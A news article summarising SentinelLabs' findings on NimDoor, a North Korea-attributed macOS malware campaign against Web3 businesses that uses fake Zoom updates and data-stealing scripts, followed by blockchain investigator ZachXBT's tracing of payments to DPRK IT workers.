NimDoor Attack Targets macOS Devices via Web3 Businesses

SentinelLabs, the research and threat intelligence arm of a prominent cybersecurity firm, has uncovered a sophisticated attack campaign called NimDoor, which targets macOS devices. This campaign is attributed to hackers from the Democratic People’s Republic of Korea (DPRK). The attack leverages the programming language Nim to inject multiple attack chains into devices used by small Web3 businesses, a trend that has recently gained traction.

The attack begins with a familiar social engineering tactic: impersonating a trusted contact to schedule a meeting via Calendly. The target then receives an email prompting them to update the ZoomZM-- application. The update script contains three lines of malicious code that retrieve and execute a second-stage script from a controlled server, disguised as a legitimate Zoom meeting link. Clicking on the link automatically downloads two Mac binaries, which initiate two independent execution chains. The first chain scrapes general system information and application-specific data, while the second ensures long-term access for the attacker.

The attack chain continues with the installation of two Bash scripts via a Trojan. One script targets data from specific browsers such as Arc, Brave, Firefox, Chrome, and Edge. The other script steals Telegram’s encrypted data and the blob used to decrypt it. The extracted data is then sent to a controlled server. This approach is unique and challenging for security analysts due to the use of multiple malware components and varied techniques, making detection difficult.

Similar attacks have been detected by other cybersecurity firms in recent months. The use of multiple malware components and varied techniques makes it difficult for security analysts to detect and mitigate these threats.

ZachXBT, a pseudonymous blockchain investigator, has uncovered a chain of payments made to Korean IT workers, which could be linked to this group of hackers. ZachXBT's findings indicate that substantial payments have been made to various DPRK developers working on diverse projects since the beginning of the year. He has identified eight separate workers associated with 12 different companies. The payments, totaling $2.76 million in USDC per month, were sent from Circle accounts to addresses associated with the developers. These addresses are closely linked to one that was blacklisted by Tether in 2023, tied to alleged conspirator Sim Hyon Sop.

ZachXBT continues to monitor similar clusters of addresses but has not made any information public as they are still active. He has issued a warning that once these workers take ownership of contracts, the underlying project is at high risk. According to ZachXBT, hiring multiple DPRK IT workers is a significant indicator that the startup is likely to fail, primarily due to the team's own negligence rather than the sophistication of the threat.